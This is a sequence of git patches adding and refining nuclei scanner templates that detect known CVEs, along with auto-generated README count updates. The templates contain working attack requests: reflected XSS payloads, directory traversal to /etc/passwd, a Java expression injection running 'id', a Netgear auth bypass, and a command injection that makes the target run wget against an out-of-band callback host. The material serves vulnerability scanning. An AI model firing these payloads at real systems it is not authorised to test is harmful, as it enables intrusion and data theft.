From 72de5ba106d1fc7e85f3c89121189db168de09a7 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 20:46:42 +0700 Subject: [PATCH 001/149] Create CVE-2016-1000127.yaml --- cves/2016/CVE-2016-1000127.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000127.yaml diff --git a/cves/2016/CVE-2016-1000127.yaml b/cves/2016/CVE-2016-1000127.yaml new file mode 100644 index 0000000000..9539d37287 --- /dev/null +++ b/cves/2016/CVE-2016-1000127.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000127 + +info: + name: AJAX Random Post <= 2.00 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000127 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 60c60f89558dc31a88718b409701e01d8a9e5cef Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 17 Jul 2021 00:29:30 +0700 Subject: [PATCH 002/149] Create CVE-2010-4231.yaml --- cves/2010/CVE-2010-4231.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 cves/2010/CVE-2010-4231.yaml diff --git a/cves/2010/CVE-2010-4231.yaml b/cves/2010/CVE-2010-4231.yaml new file mode 100644 index 0000000000..fc754ae86b --- /dev/null +++ b/cves/2010/CVE-2010-4231.yaml @@ -0,0 +1,23 @@ +id: CVE-2010-4231 + +info: + name: Camtron CMNC-200 IP Camera - Directory Traversal + author: daffainfo + severity: high + reference: https://www.exploit-db.com/exploits/15505 + tags: cve,cve2010,iot,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/../../../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From b2c5fd9f0ac4981fa7e1a1d2aaba255aea96dd72 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 17 Jul 2021 00:32:16 +0700 Subject: [PATCH 003/149] Create CVE-2010-2307.yaml --- cves/2010/CVE-2010-2307.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 cves/2010/CVE-2010-2307.yaml diff --git a/cves/2010/CVE-2010-2307.yaml b/cves/2010/CVE-2010-2307.yaml new file mode 100644 index 0000000000..392152269e --- /dev/null +++ b/cves/2010/CVE-2010-2307.yaml @@ -0,0 +1,23 @@ +id: CVE-2010-4231 + +info: + name: Motorola SBV6120E SURFboard Digital Voice Modem - Directory Traversal + author: daffainfo + severity: high + reference: https://www.securityfocus.com/bid/40550/info + tags: cve,cve2010,iot,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 4eb74ebcaed8172dd1e4bbece2254eeb63811482 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 17 Jul 2021 00:38:35 +0700 Subject: [PATCH 004/149] Update CVE-2010-2307.yaml --- cves/2010/CVE-2010-2307.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2010/CVE-2010-2307.yaml b/cves/2010/CVE-2010-2307.yaml index 392152269e..e841195a11 100644 --- a/cves/2010/CVE-2010-2307.yaml +++ b/cves/2010/CVE-2010-2307.yaml @@ -1,7 +1,7 @@ -id: CVE-2010-4231 +id: CVE-2010-2307 info: - name: Motorola SBV6120E SURFboard Digital Voice Modem - Directory Traversal + name: Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal author: daffainfo severity: high reference: https://www.securityfocus.com/bid/40550/info From 63b1837e4808e4a88f1f38044c5014ba9819b876 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Sat, 17 Jul 2021 20:27:07 +0530 Subject: [PATCH 005/149] Add files via upload --- network/vnc-detect.yaml | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 network/vnc-detect.yaml diff --git a/network/vnc-detect.yaml b/network/vnc-detect.yaml new file mode 100644 index 0000000000..36e376c81c --- /dev/null +++ b/network/vnc-detect.yaml @@ -0,0 +1,16 @@ +id: vnc-service-detection +info: + name: VNC Service Detection + author: pussycat0x + severity: info + tags: network,vnc + description: VNC service detection +network: + - inputs: + - data: "\r\n" + host: + - "{{Hostname}}:5900" + matchers: + - type: word + words: + - "RFB" \ No newline at end of file From fb22fd40c53a7ab4ec380a48a87336ebd9828df5 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sun, 18 Jul 2021 09:27:34 +0900 Subject: [PATCH 006/149] Create CVE-2020-27866.yaml This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability. Signed-off-by: GwanYeong Kim --- cves/2020/CVE-2020-27866.yaml | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 cves/2020/CVE-2020-27866.yaml diff --git a/cves/2020/CVE-2020-27866.yaml b/cves/2020/CVE-2020-27866.yaml new file mode 100644 index 0000000000..118e42e46e --- /dev/null +++ b/cves/2020/CVE-2020-27866.yaml @@ -0,0 +1,34 @@ +id: CVE-2020-27866 + +info: + name: Netgear Authentication Bypass vulnerability + author: gy741 + severity: high + description: This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability. + tags: cve,cve2020,netgear,auth-bypass + reference: | + - https://wzt.ac.cn/2021/01/13/AC2400_vuln/ + - https://www.zerodayinitiative.com/advisories/ZDI-20-1451/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866 + +requests: + - raw: + - | + GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: */* + Accept-Language: en + User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) + Connection: close + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'Debug Enable' + part: body From aec3d87e729cfe60ec03bbbf4b40d1ea69aa4fd0 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Sat, 17 Jul 2021 23:15:08 -0400 Subject: [PATCH 007/149] Update exposed-gitignore.yaml New conditions to avoid false positives. --- exposures/configs/exposed-gitignore.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposures/configs/exposed-gitignore.yaml b/exposures/configs/exposed-gitignore.yaml index d31f035d9c..61812fd088 100644 --- a/exposures/configs/exposed-gitignore.yaml +++ b/exposures/configs/exposed-gitignore.yaml @@ -24,7 +24,7 @@ requests: - type: dsl dsl: - - '!contains(tolower(body), " 50 " \ No newline at end of file + - "len(body) > 50 " From e4b2316bf0d0605d6d7f4b47e72ceb83bf631464 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Sun, 18 Jul 2021 11:11:56 +0700 Subject: [PATCH 008/149] Add CVE-2021-21479 --- cves/2021/CVE-2021-21479.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 cves/2021/CVE-2021-21479.yaml diff --git a/cves/2021/CVE-2021-21479.yaml b/cves/2021/CVE-2021-21479.yaml new file mode 100644 index 0000000000..bdfb72a5a7 --- /dev/null +++ b/cves/2021/CVE-2021-21479.yaml @@ -0,0 +1,28 @@ +id: CVE-2021-21479 + +info: + name: SCIMono < v0.0.19 Remote Code Execution + author: dwisiswant0 + severity: critical + reference: https://securitylab.github.com/advisories/GHSL-2020-227-scimono-ssti/ + description: | + In SCIMono before 0.0.19, it is possible for an attacker to inject and + execute java expression compromising the availability and integrity of the system. + tags: cve,cve2021,scim,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D" + matchers-condition: and + matchers: + - type: word + words: + - "The attribute value" + - "java.lang.UNIXProcess@" + - "has invalid value!" + part: body + condition: and + - type: status + status: + - 400 From 4414ff60db452012a5249e17f9d3f77eb3d7731c Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sun, 18 Jul 2021 22:12:01 +0900 Subject: [PATCH 009/149] Create Advantech R-SeeNet Multiple Reflected XSS vulnerabilities This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution. Signed-off-by: GwanYeong Kim --- cves/2021/CVE-2021-21801.yaml | 30 ++++++++++++++++++++++++++++++ cves/2021/CVE-2021-21802.yaml | 30 ++++++++++++++++++++++++++++++ cves/2021/CVE-2021-21803.yaml | 30 ++++++++++++++++++++++++++++++ 3 files changed, 90 insertions(+) create mode 100644 cves/2021/CVE-2021-21801.yaml create mode 100644 cves/2021/CVE-2021-21802.yaml create mode 100644 cves/2021/CVE-2021-21803.yaml diff --git a/cves/2021/CVE-2021-21801.yaml b/cves/2021/CVE-2021-21801.yaml new file mode 100644 index 0000000000..86535154c2 --- /dev/null +++ b/cves/2021/CVE-2021-21801.yaml @@ -0,0 +1,30 @@ +id: CVE-2021-21801 + +info: + name: Advantech R-SeeNet graph parameter - Reflected Cross-Site Scripting (XSS) + author: gy741 + severity: medium + description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution. + reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272 + tags: cve,cve2021,r-seenet,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22' + + matchers-condition: and + matchers: + - type: word + words: + - '"zlo onerror=alert(1) "' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/cves/2021/CVE-2021-21802.yaml b/cves/2021/CVE-2021-21802.yaml new file mode 100644 index 0000000000..0c2ec6e050 --- /dev/null +++ b/cves/2021/CVE-2021-21802.yaml @@ -0,0 +1,30 @@ +id: CVE-2021-21802 + +info: + name: Advantech R-SeeNet device_id parameter - Reflected Cross-Site Scripting (XSS) + author: gy741 + severity: medium + description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution. + reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272 + tags: cve,cve2021,r-seenet,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22' + + matchers-condition: and + matchers: + - type: word + words: + - '"zlo onerror=alert(1) "' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/cves/2021/CVE-2021-21803.yaml b/cves/2021/CVE-2021-21803.yaml new file mode 100644 index 0000000000..6b2a571f40 --- /dev/null +++ b/cves/2021/CVE-2021-21803.yaml @@ -0,0 +1,30 @@ +id: CVE-2021-21803 + +info: + name: Advantech R-SeeNet is2sim parameter - Reflected Cross-Site Scripting (XSS) + author: gy741 + severity: medium + description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution. + reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272 + tags: cve,cve2021,r-seenet,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22' + + matchers-condition: and + matchers: + - type: word + words: + - '"zlo onerror=alert(1) "' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 19fa522fecf866f7c5649835a9789e773174581d Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sun, 18 Jul 2021 22:44:29 +0900 Subject: [PATCH 010/149] Create mirai-unknown-rce.yaml The unknown exploit targets the login CGI script, where a key parameter is not properly sanitized leading to a command injection. Signed-off-by: GwanYeong Kim --- vulnerabilities/other/mirai-unknown-rce.yaml | 26 ++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 vulnerabilities/other/mirai-unknown-rce.yaml diff --git a/vulnerabilities/other/mirai-unknown-rce.yaml b/vulnerabilities/other/mirai-unknown-rce.yaml new file mode 100644 index 0000000000..544345566f --- /dev/null +++ b/vulnerabilities/other/mirai-unknown-rce.yaml @@ -0,0 +1,26 @@ +id: mirai-unknown-rce + +info: + name: Mirai Unknown - Remote Code Execution + author: gy741 + severity: critical + description: The unknown exploit targets the login CGI script, where a key parameter is not properly sanitized leading to a command injection. + reference: | + - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai + tags: mirai,rce,oob + +requests: + - raw: + - | + POST /cgi-bin/login.cgi HTTP/1.1 + Connection: keep-alive + Content-Type: application/x-www-form-urlencoded + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 + + key=';`wget http://{{interactsh-url}}`;# + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From 27b8b08b42f6f9ada541835fb79bafed0c1abee3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 18 Jul 2021 17:13:47 +0000 Subject: [PATCH 011/149] Auto Update README [Sun Jul 18 17:13:47 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index b6fb139ccd..44b521a302 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 460 | vulnerabilities | 236 | exposed-panels | 200 | +| cves | 461 | vulnerabilities | 236 | exposed-panels | 201 | | takeovers | 70 | exposures | 116 | technologies | 125 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 44 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**134 directories, 1596 files**. +**134 directories, 1598 files**. From 9971674b361a37f4f4fa500d29e709a09915a22d Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sun, 18 Jul 2021 22:54:34 +0530 Subject: [PATCH 012/149] Update CVE-2021-21479.yaml --- cves/2021/CVE-2021-21479.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2021/CVE-2021-21479.yaml b/cves/2021/CVE-2021-21479.yaml index bdfb72a5a7..e6fc7a8ee6 100644 --- a/cves/2021/CVE-2021-21479.yaml +++ b/cves/2021/CVE-2021-21479.yaml @@ -14,6 +14,7 @@ requests: - method: GET path: - "{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D" + matchers-condition: and matchers: - type: word From c56680cef31536b4e4e843b2c71c4e24202b3ba2 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 18 Jul 2021 23:14:19 +0530 Subject: [PATCH 013/149] Additional matcher --- cves/2021/CVE-2021-21801.yaml | 2 ++ cves/2021/CVE-2021-21802.yaml | 2 ++ cves/2021/CVE-2021-21803.yaml | 2 ++ 3 files changed, 6 insertions(+) diff --git a/cves/2021/CVE-2021-21801.yaml b/cves/2021/CVE-2021-21801.yaml index 86535154c2..338eccbd88 100644 --- a/cves/2021/CVE-2021-21801.yaml +++ b/cves/2021/CVE-2021-21801.yaml @@ -18,7 +18,9 @@ requests: - type: word words: - '"zlo onerror=alert(1) "' + - 'Device Status Graph' part: body + condition: and - type: word part: header diff --git a/cves/2021/CVE-2021-21802.yaml b/cves/2021/CVE-2021-21802.yaml index 0c2ec6e050..a3eeb5f61e 100644 --- a/cves/2021/CVE-2021-21802.yaml +++ b/cves/2021/CVE-2021-21802.yaml @@ -18,7 +18,9 @@ requests: - type: word words: - '"zlo onerror=alert(1) "' + - 'Device Status Graph' part: body + condition: and - type: word part: header diff --git a/cves/2021/CVE-2021-21803.yaml b/cves/2021/CVE-2021-21803.yaml index 6b2a571f40..93a8fcf35e 100644 --- a/cves/2021/CVE-2021-21803.yaml +++ b/cves/2021/CVE-2021-21803.yaml @@ -18,7 +18,9 @@ requests: - type: word words: - '"zlo onerror=alert(1) "' + - 'Device Status Graph' part: body + condition: and - type: word part: header From e975b6edac14ca168870493ba03e5fb72726e3d7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 18 Jul 2021 17:48:01 +0000 Subject: [PATCH 014/149] Auto Update README [Sun Jul 18 17:48:01 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 44b521a302..e757b0e8b7 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 461 | vulnerabilities | 236 | exposed-panels | 201 | +| cves | 464 | vulnerabilities | 236 | exposed-panels | 201 | | takeovers | 70 | exposures | 116 | technologies | 125 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 44 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**134 directories, 1598 files**. +**134 directories, 1601 files**. From 965e6fcc000b114dcb6fb7542a47052ed37b83d1 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 18 Jul 2021 23:24:55 +0530 Subject: [PATCH 015/149] minor update --- cves/2020/CVE-2020-27866.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/cves/2020/CVE-2020-27866.yaml b/cves/2020/CVE-2020-27866.yaml index 118e42e46e..78a7cfb467 100644 --- a/cves/2020/CVE-2020-27866.yaml +++ b/cves/2020/CVE-2020-27866.yaml @@ -19,7 +19,6 @@ requests: Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en - User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close matchers-condition: and @@ -30,5 +29,5 @@ requests: - type: word words: - - 'Debug Enable' - part: body + - 'Debug Enable!' + part: body \ No newline at end of file From 8d9b19651fd79ba5c4302c5521bec285bb4a9cfd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 18 Jul 2021 17:56:01 +0000 Subject: [PATCH 016/149] Auto Update README [Sun Jul 18 17:56:01 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index e757b0e8b7..a3bb0389b1 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 464 | vulnerabilities | 236 | exposed-panels | 201 | +| cves | 465 | vulnerabilities | 236 | exposed-panels | 201 | | takeovers | 70 | exposures | 116 | technologies | 125 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 44 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**134 directories, 1601 files**. +**134 directories, 1602 files**. From 0cb3c9d6b5d38514e948074f4c2a6e5621ac3088 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 18 Jul 2021 18:01:12 +0000 Subject: [PATCH 017/149] Auto Update README [Sun Jul 18 18:01:12 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index a3bb0389b1..ff039144bf 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 465 | vulnerabilities | 236 | exposed-panels | 201 | +| cves | 465 | vulnerabilities | 237 | exposed-panels | 201 | | takeovers | 70 | exposures | 116 | technologies | 125 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 44 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**134 directories, 1602 files**. +**134 directories, 1603 files**. From 556a94136b9110129cd95aefe4c427f6cda91a74 Mon Sep 17 00:00:00 2001 From: Suman Kar Date: Mon, 19 Jul 2021 10:40:50 +0530 Subject: [PATCH 018/149] Calendar Event Multi View < 1.4.01 - Unauthenticated Reflected Cross-Site Scripting (XSS) --- cves/2021/CVE-2021-24498.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 cves/2021/CVE-2021-24498.yaml diff --git a/cves/2021/CVE-2021-24498.yaml b/cves/2021/CVE-2021-24498.yaml new file mode 100644 index 0000000000..742f9b8a29 --- /dev/null +++ b/cves/2021/CVE-2021-24498.yaml @@ -0,0 +1,30 @@ +id: CVE-2021-24498 + +info: + name: Calendar Event Multi View < 1.4.01 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: suman_kar + description: The plugin does not sanitise or escape the 'start' and 'end' GET parameters before outputting them in the page (via php/edit.php), leading to a reflected Cross-Site Scripting issue. + severity: medium + tags: cve,cve2021,xss,wordpress + reference: https://wpscan.com/vulnerability/3c5a5187-42b3-4f88-9b0e-4fdfa1c39e86 + +requests: + - raw: + - | + GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 + Connection: close + matchers-condition: and + matchers: + - type: word + words: + - '><' + - 'Calendar Details' + part: body + condition: and + + - type: status + status: + - 200 \ No newline at end of file From 77fd227376d020fd688c84b7093c2dc47b5d1bfc Mon Sep 17 00:00:00 2001 From: Suman Kar <43452298+skar4444@users.noreply.github.com> Date: Mon, 19 Jul 2021 10:45:58 +0530 Subject: [PATCH 019/149] Update CVE-2021-24498.yaml --- cves/2021/CVE-2021-24498.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-24498.yaml b/cves/2021/CVE-2021-24498.yaml index 742f9b8a29..a24a3fd3cb 100644 --- a/cves/2021/CVE-2021-24498.yaml +++ b/cves/2021/CVE-2021-24498.yaml @@ -27,4 +27,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 9292a9a02586c360b47b97a0efa0575f649173d4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 10:55:56 +0530 Subject: [PATCH 020/149] Update CVE-2011-4618.yaml --- cves/2011/CVE-2011-4618.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2011/CVE-2011-4618.yaml b/cves/2011/CVE-2011-4618.yaml index e043051810..301cd48ca3 100644 --- a/cves/2011/CVE-2011-4618.yaml +++ b/cves/2011/CVE-2011-4618.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From c8776b52be2326aa53a86ac50ce1e81adc7488bc Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 10:56:53 +0530 Subject: [PATCH 021/149] Update CVE-2011-4624.yaml --- cves/2011/CVE-2011-4624.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2011/CVE-2011-4624.yaml b/cves/2011/CVE-2011-4624.yaml index 6b6eae3e15..2ae32f0d66 100644 --- a/cves/2011/CVE-2011-4624.yaml +++ b/cves/2011/CVE-2011-4624.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 92e3ef5abb45924dde979448d5df520c550b3a85 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 10:57:35 +0530 Subject: [PATCH 022/149] Update CVE-2011-4926.yaml --- cves/2011/CVE-2011-4926.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2011/CVE-2011-4926.yaml b/cves/2011/CVE-2011-4926.yaml index 17178b7f7d..bbefdb8002 100644 --- a/cves/2011/CVE-2011-4926.yaml +++ b/cves/2011/CVE-2011-4926.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 0ee4a82a5192e8490d5b29a3ac874d897d618497 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 10:58:12 +0530 Subject: [PATCH 023/149] Update CVE-2011-5106.yaml --- cves/2011/CVE-2011-5106.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2011/CVE-2011-5106.yaml b/cves/2011/CVE-2011-5106.yaml index a17da7fc2f..fb203bd625 100644 --- a/cves/2011/CVE-2011-5106.yaml +++ b/cves/2011/CVE-2011-5106.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 88cbfd1c8ae54fd1dad4ac4c5c15949a108941d0 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 10:58:42 +0530 Subject: [PATCH 024/149] Update CVE-2011-5107.yaml --- cves/2011/CVE-2011-5107.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2011/CVE-2011-5107.yaml b/cves/2011/CVE-2011-5107.yaml index c01e565c70..ef7a3e99a4 100644 --- a/cves/2011/CVE-2011-5107.yaml +++ b/cves/2011/CVE-2011-5107.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From c255951814f69c066cd46500fdeb863cd69f4caf Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 10:59:15 +0530 Subject: [PATCH 025/149] Update CVE-2011-5179.yaml --- cves/2011/CVE-2011-5179.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2011/CVE-2011-5179.yaml b/cves/2011/CVE-2011-5179.yaml index 9c92b5cf55..fc3dcab6fe 100644 --- a/cves/2011/CVE-2011-5179.yaml +++ b/cves/2011/CVE-2011-5179.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 112172ca7f8c738c5cf7e969165874a12fb0da5b Mon Sep 17 00:00:00 2001 From: Prince 